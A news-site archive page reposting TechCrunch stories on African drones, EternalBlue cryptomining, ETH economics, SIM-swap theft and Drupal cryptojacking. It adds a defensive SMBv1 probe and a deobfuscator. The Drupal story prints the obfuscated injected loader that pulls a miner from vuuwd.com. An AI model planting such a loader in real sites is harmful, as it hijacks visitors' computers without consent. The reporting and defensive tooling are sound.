Timesdelhi.com

September 21, 2018
Category archive

mining

African experiments with drone technologies could leapfrog decades of infrastructure neglect


A drone revolution is coming to sub-Saharan Africa.

Countries across the continent are experimenting with this 21st century technology as a way to leapfrog decades of neglect of 20th century infrastructure.

Over the last two years, San Francisco-based startup Zipline launched a national UAV delivery program in East Africa; South Africa passed commercial drone legislation to train and license pilots; and Malawi even opened a Drone Test Corridor to African and global partners.

In Rwanda, the country’s government became one of the first adopters of performance-based regulations for all drones earlier this year. The country’s progressive UAV programs drew special attention from the White House and two U.S. Secretaries of Transportation.

Some experts believe Africa’s drone space could contribute to UAV development in the U.S. and elsewhere around the globe.

“The fact that [global drone] companies can operate in Africa and showcase amazing use cases…is a big benefit,” said Lisa Ellsman, co-executive director of the Commercial Drone Alliance.

Test in Africa

It’s clear that the UAV programs in Malawi and Rwanda are getting attention from international drone companies.

Opened in 2017, Malawi’s Drone Test Corridor has been accepting global applications. The program is managed by the country’s Civil Aviation Authority in partnership with UNICEF.

The primary purpose is to test UAV’s for humanitarian purposes, but the program “was designed to provide a controlled platform for… governments…and other partners…to explore how UAV’s can help deliver services,” according to Michael Scheibenreif, UNICEF’s drone lead in Malawi.

That decision to include the private sector opened the launch pads for commercial drones. Swedish firm GLOBEHE has tested using the corridor and representatives from Chinese e-commerce company JD have toured the site. Other companies to test in Malawi’s corridor include Belgian UAV air traffic systems company Unifly and U.S. delivery drone manufacturer Vayu, according to Scheibenreif.

Though the government of Rwanda is most visible for its Zipline partnership, it is shaping a national testing program for multiple drone actors.

“We don’t want to limit ourselves with just one operator,” said Claudette Irere, Director General of the Ministry of Information Technology and Communications (MiTEC).

“When we started with Zipline it was more of a pilot to see if this could work,” she said. “As we’ve gotten more interest and have grown the program…this gives us an opportunity to open up to other drone operators, and give space to our local UAV operators.”

Irere said Rwanda has been approached by 16 drone operators, “some of them big names”—but could not reveal them due to temporary NDAs. She also highlighted Charis UAS, a Rwandan drone company, that’s used the country’s test program, and is now operating commercially in and outside of Rwanda.

UAV Policy

Africa’s commercial drone history is largely compressed to a handful of projects and countries within the last 5-7 years. Several governments have jumped out ahead on UAV policy.

In 2016, South Africa passed drone legislation regulating the sector under the country’s Civil Aviation Authority. The guidelines set training requirements for commercial drone pilots to receive Remote Pilot Licenses (RPLs) for Remotely Piloted Aircraft Systems. At the end of 2017 South Africa had registered 686 RPLs and 663 drone aircraft systems, according to a recent State of Drone Report.

Over the last year and a half Kenya, Ghana, and Tanzania have issued or updated drone regulatory guidelines and announced future UAV initiatives.  

In 2018, Rwanda extended its leadership role on drone policy when it adopted performance-based regulations for all drones—claiming to be the first country in the world to do so.

So what does this mean?

“In performance-based regulation the government states this is our safety threshold and you companies tell us the combination of technologies and operational mitigations you’re going to use to meet it,” said Timothy Reuter, Civil Drones Project Head at the World Economic Forum.

Lisa Ellsman, shared a similar interpretation.

“Rather than the government saying ‘you have to use this kind of technology to stop your drone,’ they would say, ‘your drone needs to be able to stop in so many seconds,’” she said.

This gives the drone operators flexibility to build drones around performance targets, vs. “prescriptively requiring a certain type of technology,” according to Ellsman.

Rwanda is still working out the implementation of its performance-based regulations, according to MiTEC’s Claudette Irere. They’ve entered a partnership with the World Economic Forum to further build out best practices. Rwanda will also soon release an online portal for global drone operators to apply to test there.

As for Rwanda being first to release performance-based regulations, that’s disputable. “Many States around the world have been developing and implementing performance-based regulations for unmanned aircraft,” said Leslie Cary, Program Manager for the International Civil Aviation Organization’s (ICAO) Remotely Piloted Aircraft Systems program. “ICAO has not monitored all of these States to determine which was first,” she added.

Other governments have done bits and pieces of Rwanda’s drone policy, according to Timothy Reuter, the head of the civil drones project at the World Economic Forum. “But as currently written in Rwanda, it’s the broadest implementation of performance-based regulations in the world.”

Commercial Use Cases

As the UAV programs across Africa mature, there are a handful of strong examples and several projects to watch.

Zipline is the most robust and visible drone use case in Sub-Saharan Africa.

While the startup’s primary focus is delivery of critical medical supplies, execs repeatedly underscore that Zipline is a for-profit venture backed by $41 million in VC.

The San Francisco-based robotics company — that also manufactures its own UAVs — was one of the earliest drone partners of the government of Rwanda.

Zipline demonstration

The alliance also brought in UPS and the UPS Foundation, which give Zipline financial and logistical support.

After several test rounds, Zipline went live with the program in October 2016, becoming the world’s first national drone delivery program at scale.

“We’ve since completed over 6000 deliveries and logged 500,000 flight kilometers,” Zipline co-founder Keenan Wyrobek told TechCrunch. “We’re planning to go live in Tanzania soon and talking to some other African countries.”  

In May Zipline was accepted into the U.S. Department of Transportation’s Unmanned Aircraft Systems Integration Pilot Program (UAS IPP). Out of 149 applicants, the Africa-focused startup was one of 10 selected to participate in a drone pilot in the U.S., operating beyond-visual-line-of-sight medical delivery services in North Carolina.

In a non-delivery commercial use case, South Africa’s Rocketmine has built out a UAV survey business in 5 countries. The company looks to book $2 million in revenue in 2018 for its “aerial data solutions” services in mining, agriculture, forestry, and civil engineering.

“We have over 50 aircraft now, compared to 15 a couple years ago,” Rocketmine CEO Christopher Clark told TechCrunch. “We operate in South Africa, Namibia, Ghana, Ivory Coast, and moved into Mexico.”

Rocketmine doesn’t plan to enter delivery services, but is looking to expand into the surveillance and security market. “After the survey market that’s probably the biggest request we get from our customers,” said Clark.

More African use cases are likely to come from the Lake Victoria Challenge — a mission specific drone operator challenge set in Tanzania’s Mwanza testing corridor. WeRobotics has also opened FlyingLabs in Kenya, Tanzania, and Benin. And the government of Zambia is reportedly working with Sony’s Aerosense on a drone delivery pilot program.

Africa and Global UAV

With Europe, Asia, and the U.S. rapidly developing drone regulations and testing (or already operating) delivery programs (see JD.com in China), Africa may not take the sole position as the leader in global UAV development — but these pilot projects in the particularly challenging environments these geographies (and economies) represent will shape the development of the drone industry. 

The continent’s test programs — and Rwanda’s performance-based drone regulations in particular — could advance beyond visual line of sight UAV technology at a quicker pace. This could set the stage for faster development of automated drone fleets for remote internet access, commercial and medical delivery, and even give Africa a lead in testing flying autonomous taxis.

“With drones, Africa is willing to take more bold steps more quickly because the benefits are there and the countries have been willing to move in a more agile manner around regulation,” said the WEF’s Reuter.

“There’s an opportunity for Africa to maintain its leadership in this space,” he said. “But the countries need to be willing to take calculated risk to enable technology companies to deploy their solutions there.”

Reuter also underscored the potential for “drone companies that originate in Africa increasingly developing services.”

There’s a case to be made this is already happening with Zipline. Though founded in California, the startup honed its UAVs and delivery model in Rwanda.

“We’re absolutely leveraging our experience built in Africa as we now test through the UAS IPP program to deliver in the U.S.,” said Zipline co-founder Keenan Wyrobek.

News Source = techcrunch.com

Cryptocurrency mining attacks using leaked NSA hacking tools are still highly active a year later


It’s been over a year since highly classified exploits built by the National Security Agency were stolen and published online.

One of the tools, dubbed EternalBlue, exploits a flaw in the SMBv1 file-sharing protocol (fixed by Microsoft’s MS17-010 update in March 2017) to take over unpatched Windows machines over the network, with no user interaction. It didn’t take long for hackers to start using the exploit to run ransomware on thousands of computers, grinding hospitals and businesses to a halt. Two separate attacks in as many months, WannaCry and NotPetya, spread like wildfire: once a single computer in a network was infected, the malware used the same exploit (among other techniques) to reach other devices on the network. Recovery was slow and cost companies hundreds of millions of dollars in damages.

Yet, more than a year since Microsoft released the patch that closes the hole, almost a million computers and networks are still unpatched and vulnerable to attack.

Although WannaCry infections have slowed, hackers are still using the publicly accessible NSA exploits to infect computers to mine cryptocurrency.

Nobody knows that better than one major Fortune 500 multinational, which was hit by a massive WannaMine cryptocurrency mining infection just days ago.

“Our customer is a very large corporation with multiple offices around the world,” said Amit Serper, who heads the security research team at Boston-based Cybereason.

“Once their first machine was hit the malware propagated to more than 1,000 machines in a day,” he said, without naming the company.

Cryptomining attacks have been around for a while. It’s more common for hackers to inject cryptocurrency mining code into vulnerable websites, but the payoffs are low. Some news sites are now installing their own mining code as an alternative to running ads.

But WannaMine works differently, Cybereason said in its post-mortem of the infection. By using those leaked NSA exploits to gain a single foothold into a network, the malware tries to infect any computer within. It’s persistent so the malware can survive a reboot. After it’s implanted, the malware uses the computer’s processor to mine cryptocurrency. On dozens, hundreds, or even thousands of computers, the malware can mine cryptocurrency far faster and more efficiently. Though it’s a drain on energy and computer resources, it can often go unnoticed.

After the malware spreads within the network, it modifies the power management settings to prevent the infected computer from going to sleep. Not only that, the malware tries to detect other cryptomining scripts running on the computer and terminates them — likely to squeeze every bit of energy out of the processor, maximizing its mining effort.

Based on up-to-date statistics from Shodan, a search engine for internet-exposed ports and services, at least 919,000 servers are still vulnerable to EternalBlue, some 300,000 of them in the US alone. And that’s just the tip of the iceberg: each of those results can be either an individual vulnerable computer or a vulnerable network server from which hundreds or thousands more machines can be infected.
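A first step toward answering “are we one of those 919,000?” is an inventory of which hosts still speak SMBv1, the protocol EternalBlue rides on. The probe below is an added example written for this page, not Cybereason’s or Shodan’s tooling: it sends an SMB1 NEGOTIATE that offers only the NT LM 0.12 dialect and classifies the answer. A server with SMBv1 disabled cannot agree to that dialect and either answers with an SMB2 header, refuses the dialect, or drops the connection. The header flag values are typical Windows-client values chosen as an assumption; the `build_negotiate_response` helper constructs a reply purely so the parser can be tested offline. The result tells you about exposure, not patch state: a host that accepts SMBv1 but has MS17-010 installed is not exploitable, so treat “smb1” as a prompt to confirm patch status on the host (or disable SMBv1 outright), and only probe hosts you are authorized to test.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
# Offer only an SMB1 dialect: a server with SMBv1 disabled has nothing to agree to
# and will refuse or drop the connection instead of falling through to SMB2/3.
DIALECT = b"\x02NT LM 0.12\x00"


def _netbios_frame(smb: bytes) -> bytes:
    """Wrap an SMB message in a NetBIOS session-service header (type 0, 3-byte big-endian length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def _smb1_header(command: int, flags: int, mid: int) -> bytes:
    """32-byte SMB1 header; flag values mirror what Windows clients commonly send (assumption)."""
    return struct.pack(
        "<4sBIBHH8sHHHHH",
        SMB1_MAGIC, command,
        0,            # NT status
        flags,        # flags
        0xC853,       # flags2: unicode, NT status codes, long names, extended security
        0,            # PID high
        b"\x00" * 8,  # security signature (unsigned)
        0,            # reserved
        0,            # TID
        0xFEFF,       # PID low
        0,            # UID
        mid,          # MID
    )


def build_negotiate_request(mid: int = 1) -> bytes:
    """SMB_COM_NEGOTIATE request offering the single dialect NT LM 0.12."""
    body = struct.pack("<BH", 0, len(DIALECT)) + DIALECT  # WordCount=0, ByteCount, dialect list
    return _netbios_frame(_smb1_header(SMB_COM_NEGOTIATE, 0x18, mid) + body)


def build_negotiate_response(dialect_index: int = 0) -> bytes:
    """Constructed minimal server reply, used only as offline test input (real replies carry 17 words)."""
    params = struct.pack("<BH", 1, dialect_index)  # WordCount=1, DialectIndex
    return _netbios_frame(_smb1_header(SMB_COM_NEGOTIATE, 0x98, 1) + params + struct.pack("<H", 0))


def classify_negotiate_response(data: bytes) -> str:
    """Classify a raw reply: 'smb1' = server accepted SMBv1, 'smb2' = server answered with SMB2/3,
    'refused' = no dialect accepted, 'unknown' = not a parseable negotiate reply."""
    if len(data) < 36:
        return "unknown"
    smb = data[4:4 + int.from_bytes(data[1:4], "big")]
    if len(smb) < 32:
        return "unknown"
    if smb[:4] == SMB2_MAGIC:
        return "smb2"
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return "unknown"
    word_count = smb[32] if len(smb) > 32 else 0
    if word_count == 0 or len(smb) < 35:
        return "refused"  # error reply: no parameter words
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    return "refused" if dialect_index == 0xFFFF else "smb1"


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Send the negotiate to host:port and classify the answer (network I/O; authorized targets only)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate_request())
            data = sock.recv(4096)
    except OSError:
        return "closed"  # refused, reset or timed out: SMBv1 off, port filtered, or host down
    return classify_negotiate_response(data) if data else "closed"


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        print(target, probe_smb1(target))
```

Run it as `python probe.py 10.0.0.5 10.0.0.6` against your own ranges and feed anything that comes back “smb1” into your patch-verification queue; a “closed” or “smb2” result means EternalBlue has no protocol to talk to on that host, whatever its patch level.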

Cybereason said companies are still severely impacted because their systems aren’t protected.

“There’s no reason why these exploits should remain unpatched,” the blog post said. “Organizations need to install security patches and update machines.”

If not ransomware yesterday, it’s cryptomining malware today. Given how versatile the EternalBlue exploit is, tomorrow it could be something far worse — like data theft or destruction.

In other words: if you haven’t patched already, what are you waiting for?

News Source = techcrunch.com

The collapse of ETH is inevitable


Here’s a prediction. ETH — the asset, not the Ethereum Network itself — will go to zero.

Those who already think that ETH will not see real adoption — thanks to a failure to scale, to adopt more secure contract authoring practices, or to out-compete its competitors — don’t need to be convinced that a price collapse would follow as a consequence.

But if one believes that Ethereum will succeed beyond anyone’s wildest dreams as a platform, running a substantial share of the world’s commerce securely, then the proposition that ETH (as a currency) will go to zero will take a bit more convincing.

So here’s how Ethereum ends up succeeding wildly but ETH becomes worthless. Ethereum’s value proposition, as given by ethereum.org, is as follows:

Build unstoppable applications

Ethereum is a decentralized platform that runs smart contracts: applications that run exactly as programmed without any possibility of downtime, censorship, fraud or third-party interference.

These apps run on a custom built blockchain, an enormously powerful shared global infrastructure that can move value around and represent the ownership of property.

This enables developers to create markets, store registries of debts or promises, move funds in accordance with instructions given long in the past (like a will or a futures contract) and many other things that have not been invented yet, all without a middleman or counterparty risk.

If Ethereum succeeds on its value proposition it will therefore mitigate external risk factors for decentralized applications.


No Future for ‘Gas’

There’s no value proposition for ETH in the official description. Perhaps this omission is because ETH’s value seems so obvious to the Ethereum Foundation that it is hardly worth mentioning: transaction fees denominated in $ETH (metered in units dubbed ‘Gas’) are how you pay for all this.

If the concept of gas isn’t immediately obvious, let’s expand the metaphor: The Ethereum network is like a shared car. When a contract wants to be driven by the shared car, the car uses up fuel, which you have to pay the driver for. How much gas money you owe depends on how far you had to be driven, and how much trash you left in the car.

Gas is a nice metaphor, but the metaphor is insufficient as an argument to support non-zero $ETH prices. Gasoline actually burns inside an internal combustion engine; an internal combustion engine will not work without a combustible fuel. $ETH as Gas is a metaphor for how gasoline is consumed; there is no hard requirement for Gas in an Ethereum contract.


Buying the “BuzzwordCoin”

Suppose we’re building a new decentralized application, BuzzwordCoin. By default, every transaction that touches the BuzzwordCoin contract (built from a standard ERC-20 token template) pays gas in $ETH. Requiring every BuzzwordCoin transaction to also depend on ETH for fees creates substantial risk, a third-party dependency, and artificial downward pressure on the price of the underlying token: if one must sell BuzzwordCoin for ETH ahead of time to run a BuzzwordCoin transaction, then the sell pressure happens before the transaction requires it, and the sale must be larger than necessary to ensure sufficient funds to cover the transaction.

Instead of paying for Gas in ETH, we could make every BuzzwordCoin transaction deposit a small amount of BuzzwordCoin directly to the block’s miner’s address to pay for the contract’s execution. Paying for Gas in a non-ETH asset is sometimes referred  to as economic abstraction in the Ethereum community.

The revised BuzzwordCoin contract has no functional dependence on ETH. We’re able to incentivize miners to mine transactions without paying any fees in ETH whatsoever.

If the BuzzwordCoin contract has non-transactional contractual clauses — that is, functionality that should be regularly called by any party, for tasks like computing and updating cached statistics in the contract — we can specify that the miner performing those clauses receives coins from an inflation or shared gas pool. In the shared pool, all fees for users’ transactions in a specific contract are paid to the contract’s wallet. A fee-dispensing contract call performing the non-transactional clauses releases the fee to the miner (this bears some semblance to Child Pays for Parent in the Bitcoin ecosystem).

Battling the economic abstraction

There are four main counterarguments to economically abstracting Ethereum: the lack of software support for economic abstraction; difficulty in pricing many tokens; the existence of contracts not tied to tokens; and the need for ETH for Proof-of-Stake. While nuanced, all four arguments fall flat.

Software Support: Currently, miners select transactions based on the amount of Gas provided in ETH. As ETH is not a contract (like an ERC-20 token), the code is special-cased for transactions dealing in ETH. However, there are efforts to make Ethereum treat ETH less as a special case and more like other ERC-20 tokens, and vice versa. WETH, for instance, wraps ETH in a 1:1 pegged ERC-20-compliant token for trading on decentralized exchanges.

Detractors of economic abstraction (notably, Vitalik Buterin) argue that the added complexity is not worth the ecosystem gains. This argument is absurd. If the software doesn’t support the needs of rational users, then the software should be amended. Furthermore, under the status quo the wallet software required for any given token is itself made more complex, as the wallet must manage balances in both ETH and the application’s token.

Market Pricing: To mine on Ethereum with economic abstraction, miners simply need software which allows them to account for discrepancies in their perceived value of active tokens and include transactions rationally on that basis.  Such software requires dynamically re-ordering pending transactions based on pricing information, gleaned either through the miner’s own outlook or monitoring cryptocurrency exchanges prices.

Vlad Zamfir argues that the potential need to monitor market information on prices makes economic abstraction difficult.

However, miners requiring pricing information is already the status quo — rational actors need a model of future ETH prices before mining (or staking) to maximize profit against electricity costs, hardware costs, and opportunity costs.

Non-Token Contracts: Not all contracts have coins, or if they do, they may not be widely recognized, valuable, and traded on exchanges. Can such contracts pay fees without ETH?

Users of a tokenless contract can pay fees in whichever tokens they want. For example, a user of TokenlessContract can pay their fees in a 50/50 mix of LemonadeCoin and TeaBucks. To ensure liquidity between users and miners with different assets they would pay or accept fees with, a user can simply issue multiple mutually-exclusive transactions paying with fees in different assets.

Specialized wallet contracts could also negotiate fees with miners directly. A miner could also process transactions paying fees in an asset they do not want if there is an open Decentralized Exchange (DEX) offer to exchange the fee asset for something they prefer. It is possible to create DEX orders for paying fees that allow only a block’s miner to fill a user’s offers, in proportion to the fees that user has paid in that block, preventing the case where a user’s fee-diversifying offers are taken by non-miners.

Proof-of-Stake: Without ETH, a modified version of Proof-of-Stake with a multitude of assets could still decide consensus if each node selects a weight vector for the voting power of all assets (let’s call it HD-PoS, or Heterogeneous Deposit Proof of Stake). While it is an open research question to show under which conditions HD-PoS would maintain consensus, consensus may be possible if the weight vectors are similar enough.

Proofs of HD-PoS may be possible by assuming a bound on the pairwise euclidean distance of the weight vectors or the maximum difference between any two prices. If such a consensus algorithm proves impossible, the failure to find such an algorithm points to a more general vulnerability in Ethereum PoS.  

Assuming a future where ETH’s main utility is governance voting, why wouldn’t all the other valuable applications on Ethereum have a say in the consensus process? Rolling back actions in a valuable token contract by burning ETH stake could be a lucrative business; if HD-PoS is used such attacks are impossible.

Vitalik Buterin (Ethereum Foundation) at TechCrunch Disrupt SF 2017

ETH’s ethereal value

If all the applications and their transactions can run without ETH, there’s no reason for ETH to be valuable unless the miners enforce some sort of racket to require users to pay in ETH. But if miners are uncoordinated, mutually disinterested, and rational, they would prefer to be paid in assets of their own choosing rather than in something like ETH. Furthermore, risk-averse users would want to minimize their exposure to volatile assets they don’t have to use. Lastly, token developers benefit because pricing in their native asset should serve to reduce sell-pressure. Thus, in a stateless ecosystem, replacing ETH is a Pareto Improvement (i.e., all parties are better off). The only party disadvantaged is existing ETH holders.

  • The author holds Stellar and Bitcoin,  but has relatively little holdings in other cryptocurrencies. He has previously done a Virtual Lapel Pin Sale (like an ICO) for his cause, “Fuck Nazis”, on top of Ethereum which faced both government censorship and censorship from the Ethereum community. 

News Source = techcrunch.com

What happens when hackers steal your SIM? You learn to keep your crypto offline


A year ago I felt a panic that still reverberates in me today. Hackers swapped my T-Mobile SIM card without my approval and methodically shut down access to most of my accounts and began reaching out to my Facebook friends asking to borrow crypto. Their social engineering tactics, to be clear, were laughable but they could have been catastrophic if my friends were less savvy.

Flash forward a year and the same thing happened to me again – my LTE coverage winked out at about 9pm and it appeared that my phone was disconnected from the network. Panicked, I rushed to my computer to try to salvage everything I could before more damage occurred. It was a false alarm but my pulse went up and I broke out in a cold sweat. I had dealt with this once before and didn’t want to deal with it again.

Sadly, I probably will. And you will, too. The SIM card swap hack is still alive and well and points to one and only one solution: keeping your crypto (and almost your entire life) offline.

Trust No Carrier

Stories about massive SIM-based hacks are all over. Most recently a crypto PR rep and investor, Michael Terpin, lost $24 million to hackers who swapped his AT&T SIM. Terpin is suing the carrier for $224 million. This move, which could set a frightening precedent for carriers, accuses AT&T of “fraud and gross negligence.”

From Krebs:

Terpin alleges that on January 7, 2018, someone requested an unauthorized SIM swap on his AT&T account, causing his phone to go dead and sending all incoming texts and phone calls to a device the attackers controlled. Armed with that access, the intruders were able to reset credentials tied to his cryptocurrency accounts and siphon nearly $24 million worth of digital currencies.

While we can wonder in disbelief at a crypto investor who keeps his cash in an online wallet secured by text message, how many other services do we use that depend on emails or text messages, two vectors easily hijacked by a SIM swap? How many of us would be resistant to the techniques that nabbed Terpin?

Another crypto owner, Namek Zu’bi, lost access to his Coinbase account after hackers swapped his SIM, logged into his account, and changed his email while attempting direct debits to his bank account.

“When the hackers took over my account they attempted direct debits into the account. But because I blocked my bank accounts before they could it seems there are bank chargebacks on that account. So Coinbase is essentially telling me sorry you can’t recover your account and we can’t help you but if you do want to use the account you owe $3K in bank chargebacks,” he said.

Now Zu’bi is facing a different issue: Coinbase is accusing him of being $3,000 in arrears and will not give him access to his account because he cannot reply from the hacker’s email.

“I tried to work with the Coinbase hotline who is supposed to help with this but they were clueless even after I told them that the hacker changed the email address on my original account and then created a new account with my email address. Since then I’ve been waiting for a ‘specialist’ to email me (was supposed to be 4 business days, it’s been 8 days) and I’m still locked out of my account because Coinbase support can’t verify me,” he said.

It has been a frustrating ride.

“As an avid supporter and investor in crypto it baffles me how one of the market leaders who just supposedly launched institutional grade custody solutions can barely deal with a basic account take-over fraud,” Zu’bi said.

How do you protect yourself?

I’ve been using Trezor hardware wallets for a while, storing them in safe places outside of my home and maintaining a separate record of the seeds in another location. I have very little crypto but even for a fraction of a few BTC it just makes sense to practice safe storage. Ultimately, if you own crypto you are now your own bank. That you would trust anyone – including a fiat bank – to keep your digital currency safe is deeply delusional. Heck, I barely trust Trezor and they seem like the only solution for safe storage right now.

When I was first hacked I posted recommendations by crypto exchange Kraken. They are still applicable today:

Call your telco and:

  • Set a passcode/PIN on your account

    • Make sure it applies to ALL account changes
    • Make sure it applies to all numbers on the account
    • Ask them what happens if you forget the passcode
      • Ask them what happens if you lose that too
  • Institute a port freeze

  • Institute a SIM lock

  • Add a high-risk flag

  • Close your online web-based management account

  • Block future registration to online management system

  • Hack yo’ self

    • See what information they will leak

    • See what account changes you can make

They also recommend changing your telco email to something wildly inappropriate and using a burner phone or Google Voice number that is completely disconnected from your regular accounts as a sort of blind for your two factor texts and alerts.

Sadly, doing all of these things is quite difficult. Further, carriers don’t make it easy. In May a 27-year-old man named Paul Rosenzweig fell victim to a SIM-swapping hack even though he had a SIM lock on his account. A rogue T-Mobile employee bypassed the security, resulting in the loss of a unique three-character Twitter and Snapchat account.

Ultimately nothing is secure. The bottom line is simple: if you’re in crypto expect to be hacked and expect it to be painful and frustrating. What you do now – setting up real two-factor authentication (an authenticator app or hardware key, not a code sent by SMS to a number a carrier employee can reassign), offloading your crypto onto physical hardware, making diligent backups, and protecting your keys – will make things far better for you in the long run. Ultimately, you don’t want to wake up one morning with your phone off and all of your crypto siphoned off into the pocket of a college kid like Joel Ortiz, a hacker who is now facing jail time for “13 counts of identity theft, 13 counts of hacking, and two counts of grand theft.” Sadly, none of the crypto he stole has surfaced after his arrest.

News Source = techcrunch.com

Outdated website software lets hackers mine cryptocurrencies at your expense


An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of Javascript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.

The injected code appears at the end of jquery.once.js and was still visible on an affected site when this was written. It consists of a single line, with every string hidden behind \x hex escapes:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Which, with the escapes decoded, translates to:

'use strict';
// Find <head> and build a new <script> element
var dZ1 = window["document"]["getElementsByTagName"]('head')[0];
var ZBRnO2 = window["document"]["createElement"]('script');
ZBRnO2["type"] = "text/javascript";
ZBRnO2["id"] = "m_g_a";
// The second stage: the Coinhive loader served from the attacker's domain
ZBRnO2["src"] = "https://vuuwd.com/t.js";
// Append it to <head> so the browser fetches and runs the miner
dZ1["appendChild"](ZBRnO2);
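Doing that decoding by hand is error-prone when the loader changes shape between sites. The helper below is an added example written for this page (not from the article or from Bad Packets) that reverses this style of obfuscation mechanically, so an injected loader can be read and its second-stage URL pulled out without ever executing it in a browser. It handles both `\x41`-style escapes and the backslash-stripped `x41x42` runs that appear when a sample is copied out of a web page, then rewrites `obj["name"]` as `obj.name` for readability. The sample input is the line quoted above with its escapes restored; nothing here fetches the remote script.

```python
import re

# Obfuscated loader quoted in the article (escapes restored); used here as the sample input.
OBFUSCATED = (
    r'var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]'
    r'["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]'
    r"('\x68\x65\x61\x64')[0]; "
    r'var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]'
    r'["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]'
    r"('\x73\x63\x72\x69\x70\x74'); "
    r'ZBRnO2["\x74\x79\x70\x65"]= '
    r"'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; "
    r'ZBRnO2["\x69\x64"]='
    r"'\x6d\x5f\x67\x5f\x61';"
    r'ZBRnO2["\x73\x72\x63"]= '
    r"'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; "
    r'dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);'
)

# A proper JavaScript \xHH escape.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Two or more "xHH" groups with the backslashes stripped, as seen in copy-pasted samples.
# The lookarounds stop it from eating the tail of an ordinary identifier such as "box64x6f".
BARE_HEX_RUN = re.compile(r"(?<![\\\w])((?:x[0-9a-fA-F]{2}){2,})(?!\w)")
# obj["name"] / obj['name'] where the key is a valid identifier.
BRACKET_MEMBER = re.compile(r'\[(["\'])([A-Za-z_$][\w$]*)\1\]')
# Assignment of a quoted string to a .src property (the second-stage loader URL).
SRC_ASSIGN = re.compile(r'\.src\s*=\s*(["\'])([^"\']+)\1')


def decode_hex_escapes(code: str) -> str:
    """Replace \\xHH escapes (and backslash-stripped xHHxHH runs) with the characters they encode."""
    def _bare(match: re.Match) -> str:
        run = match.group(1)
        return "".join(chr(int(run[i + 1:i + 3], 16)) for i in range(0, len(run), 3))

    code = BARE_HEX_RUN.sub(_bare, code)
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), code)


def simplify_member_access(code: str) -> str:
    """Turn window["document"]["createElement"] into window.document.createElement."""
    return BRACKET_MEMBER.sub(r".\2", code)


def deobfuscate(code: str) -> str:
    """Full pass: decode string escapes, then make member access readable."""
    return simplify_member_access(decode_hex_escapes(code))


def injected_script_urls(code: str) -> list:
    """URLs assigned to .src in the deobfuscated loader, i.e. where the miner is fetched from."""
    return [m.group(2) for m in SRC_ASSIGN.finditer(deobfuscate(code))]


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
    print("second stage:", injected_script_urls(OBFUSCATED))
```

The extracted URL is what you block at the proxy and search for across the rest of your sites; the decoded text is what goes in the incident write-up. Paste any other suspicious tail of a JS file into `OBFUSCATED` to apply the same pass.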

The domain it calls, vuuwd.com, is down.

Bad Packets Report, Mursch’s site, has a full list of the hacked websites and, given that the injected code above was still live, it doesn’t seem that many site owners are rushing to fix their sites.

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.

News Source = techcrunch.com
